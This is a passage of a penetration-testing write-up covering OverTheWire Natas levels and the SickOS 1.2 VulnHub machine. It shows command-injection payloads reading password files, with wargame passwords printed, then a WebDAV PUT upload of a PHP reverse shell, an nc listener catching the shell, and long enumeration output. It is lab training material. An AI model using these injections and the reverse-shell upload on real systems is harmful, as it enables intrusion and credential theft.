                    drwxr-x---  3 natas31 natas31  4096 Jun 25  2016 natas31
                    drwxr-x---  3 natas32 natas32  4096 Jun 25  2016 natas32
                    drwxr-x---  2 natas33 natas33  4096 Jun 25  2016 natas33
                    drwxr-x---  2 natas4  natas4   4096 Jun 25  2016 natas4
                    drwxr-x---  2 natas5  natas5   4096 Jun 25  2016 natas5
                    drwxr-x---  3 natas6  natas6   4096 Jun 25  2016 natas6
                    drwxr-x---  2 natas7  natas7   4096 Jun 25  2016 natas7
                    drwxr-x---  2 natas8  natas8   4096 Jun 25  2016 natas8
                    drwxr-x---  2 natas9  natas9   4096 Jun 25  2016 natas9
                    drwxr-x---  4 root    www-data 4096 Jun 25  2016 stats

                    test; ls -la ../../../../../-rw-r-----  1 natas9 natas9 460878 Jun 25  2016 dictionary.txt

                    ../../../../../:
                    total 7965
                    drwxr-xr-x  26 root root    4096 Mar 13  2016 .
                    drwxr-xr-x  26 root root    4096 Mar 13  2016 ..
                    -rw-r--r--   1 root root    2797 Nov  4  2015 README.txt
                    lrwxrwxrwx   1 root root      15 Nov 14  2014 behemoth -> /games/behemoth
                    drwxr-xr-x   2 root root    4096 Nov 17 09:14 bin
                    drwxr-xr-x   2 root root    4096 Apr 20  2014 boot
                    drwxr-xr-x  12 root root   13680 Dec 23 13:00 dev
                    drwxr-xr-x   7 root root    4096 Jan 12  2015 drifter
                    lrwxrwxrwx   1 root root      11 Nov 14  2014 eloi -> /games/eloi
                    drwxr-xr-x 108 root root    4096 Jan  6 13:46 etc
                    drwxr-xr-x  11 root root    1024 Mar 18  2015 games
                    drwxr-xr-x 172 root root    4096 Jul 10 14:12 home
                    lrwxrwxrwx   1 root root      14 Nov 14  2014 krypton -> /games/krypton
                    drwxr-xr-x  18 root root    4096 Jun 10  2016 lib
                    drwxr-xr-x   2 root root    4096 Jun 10  2016 lib32
                    drwxr-xr-x   2 root root    4096 Jun 10  2016 lib64
                    drwxr-xr-x   2 root root    4096 Jun 10  2016 libx32
                    drwx------   2 root root   16384 Apr 20  2014 lost+found
                    lrwxrwxrwx   1 root root      14 Nov 14  2014 manpage -> /games/manpage
                    lrwxrwxrwx   1 root root      11 Nov 14  2014 maze -> /games/maze
                    drwxr-xr-x   3 root root    4096 Apr 20  2014 media
                    drwxr-xr-x   2 root root    4096 Apr 10  2014 mnt
                    lrwxrwxrwx   1 root root      13 Nov 14  2014 narnia -> /games/narnia
                    drwxr-xr-x   2 root root    4096 Apr 16  2014 opt
                    dr-xr-xr-x 547 root root       0 Dec 23 13:00 proc
                    drwx------  11 root root    4096 Jul 10 14:12 root
                    drwxr-xr-x  18 root root     680 Jan  6 20:52 run
                    drwxr-xr-x   2 root root   12288 Sep 30 13:28 sbin
                    lrwxrwxrwx   1 root root      13 Nov 14  2014 semtex -> /games/semtex
                    drwxr-xr-x   2 root root    4096 Apr 16  2014 srv
                    dr-xr-xr-x  13 root root       0 Dec 23 13:29 sys
                    drwxrwx-wt   1 root root 8036352 Jan  6 20:52 tmp
                    drwxr-xr-x  12 root root    4096 Nov 14  2014 usr
                    lrwxrwxrwx   1 root root      13 Nov 14  2014 utumno -> /games/utumno
                    drwxr-xr-x  15 root root    4096 Nov 14  2014 var
                    lrwxrwxrwx   1 root root      13 Nov 14  2014 vortex -> /games/vortex

                    test;cat ../../../../../README.txt
                    Output:
                                 
                          ,----..            ,----,          .---.
                         /   /   \         ,/   .`|         /. ./|
                        /   .     :      ,`   .'  :     .--'.  ' ;
                       .   /   ;.  \   ;    ;     /    /__./ \ : |
                      .   ;   /  ` ; .'___,/    ,' .--'.  '   \' .
                      ;   |  ; \ ; | |    :     | /___/ \ |    ' '
                      |   :  | ; | ' ;    |.';  ; ;   \  \;      :
                      .   |  ' ' ' : `----'  |  |  \   ;  `      |
                      '   ;  \; /  |     '   :  ;   .   \    .\  ;
                       \   \  ',  /      |   |  '    \   \   ' \ |
                        ;   :    /       '   :  |     :   '  |--"
                         \   \ .'        ;   |.'       \   \ ;  
                      www. `---` ver     '---' he       '---" ire.org  
                                 
                               
                    Welcome to the OverTheWire games machine!

                    If you find any problems, please report them to Steven on
                    irc.overthewire.org.

                    --[ Playing the games ]--

                      This machine holds several wargames.
                      If you are playing "somegame", then:

                        * USERNAMES are somegame0, somegame1, ...
                        * Most LEVELS are stored in /somegame/.
                        * PASSWORDS for each level are stored in /etc/somegame_pass/.

                      Write-access to homedirectories is disabled. It is advised to create a
                      working directory with a hard-to-guess name in /tmp/.  You can use the
                      command "mktemp -d" in order to generate a random and hard to guess
                      directory in /tmp/.  Read-access to both /tmp/ and /proc/ is disabled
                      so that users can not snoop on eachother.

                      Please play nice:
                       
                        * don't leave orphan processes running
                        * don't leave exploit-files laying around
                        * don't annoy other players
                        * don't post passwords or spoilers
                        * again, DONT POST SPOILERS!
                          This includes writeups of your solution on your blog or website!

                    --[ Tips ]--

                      This machine has a 64bit processor and many security-features enabled
                      by default, although ASLR has been switched off.  The following
                      compiler flags might be interesting:

                        -m32                    compile for 32bit
                        -fno-stack-protector    disable ProPolice
                        -Wl,-z,norelro          disable relro

                      In addition, the execstack tool can be used to flag the stack as
                      executable on ELF binaries.

                      Finally, network-access is limited for most levels by a local
                      firewall.

                    --[ Tools ]--

                     For your convenience we have installed a few usefull tools which you can find
                     in the following locations:

                        * peda (https://github.com/longld/peda.git) in /usr/local/peda/
                        * gdbinit (https://github.com/gdbinit/Gdbinit) in /usr/local/gdbinit/
                        * pwntools (https://github.com/Gallopsled/pwntools) in /usr/src/pwntools/
                        * radare2 (http://www.radare.org/) should be in $PATH

                    --[ More information ]--

                      For more information regarding individual wargames, visit
                      http://www.overthewire.org/wargames/

                      For questions or comments, contact us through IRC on
                      irc.overthewire.org.

                     test;cat ../../../../../etc/natas_webpass/natas10
                     nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

                     test;cat ../../../../../etc/lsb-release
                     DISTRIB_ID=Ubuntu
                    DISTRIB_RELEASE=14.04
                    DISTRIB_CODENAME=trusty
                    DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS

                    L10:
                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas10", "pass": "<censored>" };</script></head>
                    <body>
                    <h1>natas10</h1>
                    <div id="content">

                    For security reasons, we now filter on certain characters<br/><br/>
                    <form>
                    Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
                    </form>


                    Output:
                    <pre>
                    <?
                    $key = "";

                    if(array_key_exists("needle", $_REQUEST)) {
                        $key = $_REQUEST["needle"];
                    }

                    if($key != "") {
                        if(preg_match('/[;|&]/',$key)) {
                            print "Input contains an illegal character!";
                        } else {
                            passthru("grep -i $key dictionary.txt");
                        }
                    }
                    ?>
                    </pre>

                    <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
                    </div>
                    </body>
                    </html>

                    . /etc/natas_webpass/natas11
                    U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

                    Regards,
                    Yuriy Stanchev/URIX

                    SickOS 1.2

                    This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of SickOs 1.2 vulnarable VM: 
                    https://www.vulnhub.com/entry/sickos-12,144/

                    Home brewed tools used: https://github.com/iuristanchev/pentesting_tools

                    Currently scanning: Finished!   |   Screen View: Unique Hosts              
                                                                                                 
                     5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 300            
                     _____________________________________________________________________________
                       IP            At MAC Address     Count     Len  MAC Vendor / Hostname    
                     -----------------------------------------------------------------------------
                     192.168.1.9     00:0c:29:98:f5:19      1      60  VMware, Inc.              

                     Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-04 20:24 EET
                    Nmap scan report for 192.168.1.9
                    Host is up (0.00026s latency).
                    PORT   STATE SERVICE VERSION
                    80/tcp open  http    lighttpd 1.4.28
                    |_http-server-header: lighttpd/1.4.28
                    | http-useragent-tester:
                    |
                    |     Allowed User Agents:
                    |     Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
                    |     libwww
                    |     lwp-trivial
                    |     libcurl-agent/1.0
                    |     PHP/
                    |     Python-urllib/2.5
                    |     GT::WWW
                    |     Snoopy
                    |     MFC_Tear_Sample
                    |     HTTP::Lite
                    |     PHPCrawl
                    |     URI::Fetch
                    |     Zend_Http_Client
                    |     http client
                    |     PECL::HTTP
                    |     Wget/1.13.4 (linux-gnu)
                    |     WWW-Mechanize/1.34
                    |_
                    MAC Address: 00:0C:29:98:F5:19 (VMware)


                     Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-04 20:26 EET
                    Nmap scan report for 192.168.1.9
                    Host is up (0.00016s latency).
                    PORT   STATE SERVICE
                    80/tcp open  http
                    | http-comments-displayer:
                    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.9
                    |  
                    |     Path: http://192.168.1.9:80/
                    |     Line number: 96
                    |     Comment:
                    |         <!-- NOTHING IN HERE ///\\\ -->
                    |  
                    |     Path: http://192.168.1.9:80/
                    |     Line number: 96
                    |     Comment:
                    |_         ///\\\ -->>>>
                    MAC Address: 00:0C:29:98:F5:19 (VMware)

                    amap v5.4 (www.thc.org/thc-amap) started at 2017-01-04 20:34:33 - APPLICATION MAPPING mode

                    Total amount of tasks to perform in plain connect mode: 23
                    Waiting for timeout on 23 connections ...
                    Protocol on 192.168.1.9:80/tcp matches http - banner: HTTP/1.0 200 OK\r\nX-Powered-By PHP/5.3.10-1ubuntu3.21\r\nContent-type text/html\r\nContent-Length 163\r\nConnection close\r\nDate Wed, 04 Jan 2017 203433 GMT\r\nServer lighttpd/1.4.28\r\n\r\n<html>\n\n<img src="blow.jpg">\n\n</html>\n\n\n\n\n\n\n\n\n\n\n

                    DIRB v2.22  
                    By The Dark Raver
                    -----------------

                    START_TIME: Wed Jan  4 20:57:05 2017
                    URL_BASE: http://192.168.1.9:80/
                    WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

                    -----------------

                    GENERATED WORDS: 20458                                                      

                    ---- Scanning URL: http://192.168.1.9:80/ ----
                    ==> DIRECTORY: http://192.168.1.9:80/test/                                  
                    + http://192.168.1.9:80/~sys~ (CODE:403|SIZE:345)                            
                                                                                                 
                    ---- Entering directory: http://192.168.1.9:80/test/ ----
                    (!) WARNING: Directory IS LISTABLE. No need to scan it.                      
                        (Use mode '-w' if you want to scan it anyway)

                    *   Trying 192.168.1.9...
                    * Connected to 192.168.1.9 (192.168.1.9) port 80 (#0)
                    > OPTIONS /test/ HTTP/1.1
                    > Host: 192.168.1.9
                    > User-Agent: curl/7.47.0
                    > Accept: */*
                    >
                    < HTTP/1.1 200 OK
                    < DAV: 1,2
                    < MS-Author-Via: DAV
                    < Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
                    < Allow: OPTIONS, GET, HEAD, POST
                    < Content-Length: 0
                    < Date: Wed, 04 Jan 2017 21:01:06 GMT
                    < Server: lighttpd/1.4.28
                    <
                    * Connection #0 to host 192.168.1.9 left intact
                    nc -nlvp 443
                    curl --upload-file  /root/Desktop/pentesting_tools/tools/php-reverse-shell.txt -v --url http://192.168.1.9/test/shell.php -0 --http1.0

                    *   Trying 192.168.1.9...
                    * Connected to 192.168.1.9 (192.168.1.9) port 80 (#0)
                    > PUT /test/shell.php HTTP/1.0
                    > Host: 192.168.1.9
                    > User-Agent: curl/7.47.0
                    > Accept: */*
                    > Content-Length: 5495
                    >
                    * We are completely uploaded and fine
                    * HTTP 1.0, assume close after body
                    < HTTP/1.0 201 Created
                    < Content-Length: 0
                    < Connection: close
                    < Date: Wed, 04 Jan 2017 21:43:01 GMT
                    < Server: lighttpd/1.4.28
                    <
                    * Closing connection 0

                    nc -nlvp 443
                    listening on [any] 443 ...
                    connect to [192.168.1.20] from (UNKNOWN) [192.168.1.9] 46960
                    Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
                     13:43:47 up  1:30,  0 users,  load average: 0.02, 0.04, 0.05
                    USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
                    uid=33(www-data) gid=33(www-data) groups=33(www-data)
                    bash: no job control in this shell
                    www-data@ubuntu:/$ whoami
                    whoami
                    www-data
                    www-data@ubuntu:/$

                    python -c 'import pty; pty.spawn("/bin/sh")'

                    cat /etc/debian_version
                    wheezy/sid

                    uname -v
                    #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014

                    #########################################################
                    # Local Linux Enumeration & Privilege Escalation Script #
                    #########################################################
                    # www.rebootuser.com
                    #

                    Debug Info
                    thorough tests = disabled


                    Scan started at:
                    Thu Jan  5 09:43:36 PST 2017


                    ### SYSTEM ##############################################
                    Kernel information:
                    Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux


                    Kernel information (continued):
                    Linux version 3.11.0-15-generic (buildd@akateko) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014


                    Specific release information:
                    DISTRIB_ID=Ubuntu
                    DISTRIB_RELEASE=12.04
                    DISTRIB_CODENAME=precise
                    DISTRIB_DESCRIPTION="Ubuntu 12.04.4 LTS"
                    NAME="Ubuntu"
                    VERSION="12.04.4 LTS, Precise Pangolin"
                    ID=ubuntu
                    ID_LIKE=debian
                    PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"
                    VERSION_ID="12.04"


                    Hostname:
                    ubuntu


                    ### USER/GROUP ##########################################
                    Current user/group info:
                    uid=33(www-data) gid=33(www-data) groups=33(www-data)


                    Users that have previously logged onto the system:
                    Username         Port     From             Latest
                    root             pts/0    192.168.0.100    Tue Apr 26 03:57:15 -0700 2016
                    john             tty1                      Wed Mar 30 05:09:38 -0700 2016


                    All users and uid/gid info:
                    root:x:0:0
                    daemon:x:1:1
                    bin:x:2:2
                    sys:x:3:3
                    sync:x:4:65534
                    games:x:5:60
                    man:x:6:12
                    lp:x:7:7
                    mail:x:8:8
                    news:x:9:9
                    uucp:x:10:10
                    proxy:x:13:13
                    www-data:x:33:33
                    backup:x:34:34
                    list:x:38:38
                    irc:x:39:39
                    gnats:x:41:41
                    nobody:x:65534:65534
                    libuuid:x:100:101
                    syslog:x:101:103
                    messagebus:x:102:104
                    john:x:1000:1000
                    sshd:x:103:65534


                    Group memberships:
                    uid=0(root) gid=0(root) groups=0(root)
                    uid=1(daemon) gid=1(daemon) groups=1(daemon)
                    uid=2(bin) gid=2(bin) groups=2(bin)
                    uid=3(sys) gid=3(sys) groups=3(sys)
                    uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
                    uid=5(games) gid=60(games) groups=60(games)
                    uid=6(man) gid=12(man) groups=12(man)
                    uid=7(lp) gid=7(lp) groups=7(lp)
                    uid=8(mail) gid=8(mail) groups=8(mail)
                    uid=9(news) gid=9(news) groups=9(news)
                    uid=10(uucp) gid=10(uucp) groups=10(uucp)
                    uid=13(proxy) gid=13(proxy) groups=13(proxy)
                    uid=33(www-data) gid=33(www-data) groups=33(www-data)
                    uid=34(backup) gid=34(backup) groups=34(backup)
                    uid=38(list) gid=38(list) groups=38(list)
                    uid=39(irc) gid=39(irc) groups=39(irc)
                    uid=41(gnats) gid=41(gnats) groups=41(gnats)
                    uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
                    uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
                    uid=101(syslog) gid=103(syslog) groups=103(syslog)
                    uid=102(messagebus) gid=104(messagebus) groups=104(messagebus)
                    uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
                    uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)


                    Sample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):
                    root:x:0:0:root:/root:/bin/bash
                    john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash


                    Super user account(s):
                    root


                    Are permissions on /home directories lax:
                    total 12K
                    drwxr-xr-x  3 root root 4.0K Mar 30  2016 .
                    drwxr-xr-x 22 root root 4.0K Mar 30  2016 ..
                    drwxr-xr-x  3 john john 4.0K Apr 12  2016 john


                    Root is allowed to login via SSH:
                    PermitRootLogin yes


                    ### ENVIRONMENTAL #######################################
                    Path information:
                    /sbin:/bin:/usr/sbin:/usr/bin


                    Available shells:
                    # /etc/shells: valid login shells
                    /bin/sh
                    /bin/dash
                    /bin/bash
                    /bin/rbash


                    Current umask value:
                    0000
                    u=rwx,g=rwx,o=rwx


                    umask value as specified in /etc/login.defs:
                    UMASK 022


                    Password and storage information:
                    PASS_MAX_DAYS 99999
                    PASS_MIN_DAYS 0
                    PASS_WARN_AGE 7
                    ENCRYPT_METHOD SHA512


                    ### JOBS/TASKS ##########################################
                    Cron jobs:
                    -rw-r--r-- 1 root root  722 Jun 19  2012 /etc/crontab

                    /etc/cron.daily:
                    total 72
                    drwxr-xr-x  2 root root  4096 Apr 12  2016 .
                    drwxr-xr-x 84 root root  4096 Jan  5 09:41 ..
                    -rw-r--r--  1 root root   102 Jun 19  2012 .placeholder
                    -rwxr-xr-x  1 root root 15399 Nov 15  2013 apt
                    -rwxr-xr-x  1 root root   314 Apr 18  2013 aptitude
                    -rwxr-xr-x  1 root root   502 Mar 31  2012 bsdmainutils
                    -rwxr-xr-x  1 root root  2032 Jun  4  2014 chkrootkit
                    -rwxr-xr-x  1 root root   256 Oct 14  2013 dpkg
                    -rwxr-xr-x  1 root root   338 Dec 20  2011 lighttpd
                    -rwxr-xr-x  1 root root   372 Oct  4  2011 logrotate
                    -rwxr-xr-x  1 root root  1365 Dec 28  2012 man-db
                    -rwxr-xr-x  1 root root   606 Aug 17  2011 mlocate
                    -rwxr-xr-x  1 root root   249 Sep 12  2012 passwd
                    -rwxr-xr-x  1 root root  2417 Jul  1  2011 popularity-contest
                    -rwxr-xr-x  1 root root  2947 Jun 19  2012 standard

                    /etc/cron.hourly:
                    total 12
                    drwxr-xr-x  2 root root 4096 Mar 30  2016 .
                    drwxr-xr-x 84 root root 4096 Jan  5 09:41 ..
                    -rw-r--r--  1 root root  102 Jun 19  2012 .placeholder

                    /etc/cron.monthly:
                    total 12
                    drwxr-xr-x  2 root root 4096 Mar 30  2016 .
                    drwxr-xr-x 84 root root 4096 Jan  5 09:41 ..
                    -rw-r--r--  1 root root  102 Jun 19  2012 .placeholder

                    /etc/cron.weekly:
                    total 20
                    drwxr-xr-x  2 root root 4096 Mar 30  2016 .
                    drwxr-xr-x 84 root root 4096 Jan  5 09:41 ..
                    -rw-r--r--  1 root root  102 Jun 19  2012 .placeholder
                    -rwxr-xr-x  1 root root  730 Sep 13  2013 apt-xapian-index
                    -rwxr-xr-x  1 root root  907 Dec 28  2012 man-db


                    Crontab contents:
                    # /etc/crontab: system-wide crontab
                    # Unlike any other crontab you don't have to run the `crontab'
                    # command to install the new version when you edit this file
                    # and files in /etc/cron.d. These files also have username fields,
                    # that none of the other crontabs do.

                    SHELL=/bin/sh
                    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

                    # m h dom mon dow user command
                    17 * * * * root    cd / && run-parts --report /etc/cron.hourly
                    25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
                    47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
                    52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
                    #


                    ### NETWORKING  ##########################################
                    Network & IP info:
                    eth0      Link encap:Ethernet  HWaddr 00:0c:29:98:f5:19
                              inet addr:192.168.1.9  Bcast:192.168.1.255  Mask:255.255.255.0
                              inet6 addr: fe80::20c:29ff:fe98:f519/64 Scope:Link
                              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
                              RX packets:268 errors:0 dropped:0 overruns:0 frame:0
                              TX packets:201 errors:0 dropped:0 overruns:0 carrier:0
                              collisions:0 txqueuelen:1000
                              RX bytes:142432 (142.4 KB)  TX bytes:22042 (22.0 KB)
                              Interrupt:19 Base address:0x2000

                    lo        Link encap:Local Loopback
                              inet addr:127.0.0.1  Mask:255.0.0.0
                              inet6 addr: ::1/128 Scope:Host
                              UP LOOPBACK RUNNING  MTU:65536  Metric:1
                              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
                              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
                              collisions:0 txqueuelen:0
                              RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)


                    Nameserver(s):
                    nameserver 192.168.1.1


                    Default route:
                    default         192.168.1.1     0.0.0.0         UG    100    0        0 eth0


                    Listening TCP:
                    Active Internet connections (servers and established)
                    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
                    tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -            
                    tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -            
                    tcp        0      0 192.168.1.9:56045       192.168.1.20:443        ESTABLISHED 984/php-cgi  
                    tcp        0      0 192.168.1.9:80          192.168.1.20:48676      ESTABLISHED -            
                    tcp6       0      0 :::22                   :::*                    LISTEN      -            


                    Listening UDP:
                    Active Internet connections (servers and established)
                    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
                    udp        0      0 0.0.0.0:68              0.0.0.0:*                           -            


                    ### SERVICES #############################################
                    Running processes:
                    USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
                    root         1  0.5  0.1   3396  1832 ?        Ss   09:41   0:00 /sbin/init
                    root         2  0.0  0.0      0     0 ?        S    09:41   0:00 [kthreadd]
                    root         3  0.0  0.0      0     0 ?        S    09:41   0:00 [ksoftirqd/0]
                    root         4  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/0:0]
                    root         5  0.0  0.0      0     0 ?        S<   09:41   0:00 [kworker/0:0H]
                    root         6  0.1  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:0]
                    root         7  0.0  0.0      0     0 ?        S    09:41   0:00 [migration/0]
                    root         8  0.0  0.0      0     0 ?        S    09:41   0:00 [rcu_bh]
                    root         9  0.0  0.0      0     0 ?        S    09:41   0:00 [rcu_sched]
                    root        10  0.0  0.0      0     0 ?        S    09:41   0:00 [watchdog/0]
                    root        11  0.0  0.0      0     0 ?        S<   09:41   0:00 [khelper]
                    root        12  0.0  0.0      0     0 ?        S    09:41   0:00 [kdevtmpfs]
                    root        13  0.0  0.0      0     0 ?        S<   09:41   0:00 [netns]
                    root        14  0.0  0.0      0     0 ?        S<   09:41   0:00 [writeback]
                    root        15  0.0  0.0      0     0 ?        S<   09:41   0:00 [kintegrityd]
                    root        16  0.0  0.0      0     0 ?        S<   09:41   0:00 [bioset]
                    root        17  0.0  0.0      0     0 ?        S<   09:41   0:00 [kworker/u17:0]
                    root        18  0.0  0.0      0     0 ?        S<   09:41   0:00 [kblockd]
                    root        19  0.0  0.0      0     0 ?        S<   09:41   0:00 [ata_sff]
                    root        20  0.0  0.0      0     0 ?        S    09:41   0:00 [khubd]
                    root        21  0.0  0.0      0     0 ?        S<   09:41   0:00 [md]
                    root        22  0.0  0.0      0     0 ?        S<   09:41   0:00 [devfreq_wq]
                    root        23  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/0:1]
                    root        25  0.0  0.0      0     0 ?        S    09:41   0:00 [khungtaskd]
                    root        26  0.0  0.0      0     0 ?        S    09:41   0:00 [kswapd0]
                    root        27  0.0  0.0      0     0 ?        SN   09:41   0:00 [ksmd]
                    root        28  0.0  0.0      0     0 ?        SN   09:41   0:00 [khugepaged]
                    root        29  0.0  0.0      0     0 ?        S    09:41   0:00 [fsnotify_mark]
                    root        30  0.0  0.0      0     0 ?        S    09:41   0:00 [ecryptfs-kthrea]
                    root        31  0.0  0.0      0     0 ?        S<   09:41   0:00 [crypto]
                    root        43  0.0  0.0      0     0 ?        S<   09:41   0:00 [kthrotld]
                    root        44  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:1]
                    root        45  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_0]
                    root        46  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_1]
                    root        47  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:2]
                    root        48  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:3]
                    root        49  0.0  0.0      0     0 ?        S<   09:41   0:00 [dm_bufio_cache]
                    root        50  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:4]
                    root        69  0.0  0.0      0     0 ?        S<   09:41   0:00 [deferwq]
                    root        70  0.0  0.0      0     0 ?        S<   09:41   0:00 [charger_manager]
                    root        71  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/0:2]
                    root       193  0.0  0.0      0     0 ?        S<   09:41   0:00 [mpt_poll_0]
                    root       208  0.0  0.0      0     0 ?        S<   09:41   0:00 [mpt/0]
                    root       220  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_2]
                    root       221  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_3]
                    root       227  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_4]
                    root       229  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_5]
                    root       231  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_6]
                    root       232  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_7]
                    root       233  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_8]
                    root       234  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_9]
                    root       237  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_10]
                    root       238  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_11]
                    root       239  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_12]
                    root       240  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_13]
                    root       241  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_14]
                    root       242  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_15]
                    root       243  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_16]
                    root       244  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_17]
                    root       245  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_18]
                    root       246  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_19]
                    root       247  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_20]
                    root       248  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_21]
                    root       249  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_22]
                    root       250  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_23]
                    root       251  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_24]
                    root       252  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_25]
                    root       253  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_26]
                    root       254  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_27]
                    root       255  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_28]
                    root       256  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_29]
                    root       257  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_30]
                    root       258  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_31]
                    root       259  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:5]
                    root       260  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:6]
                    root       261  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:7]
                    root       262  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:8]
                    root       263  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:9]
                    root       264  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:10]
                    root       265  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:11]
                    root       266  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:12]
                    root       267  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:13]
                    root       268  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:14]
                    root       269  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:15]
                    root       270  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:16]
                    root       271  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:17]
                    root       272  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:18]
                    root       273  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:19]
                    root       274  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:20]
                    root       275  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:21]
                    root       276  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:22]
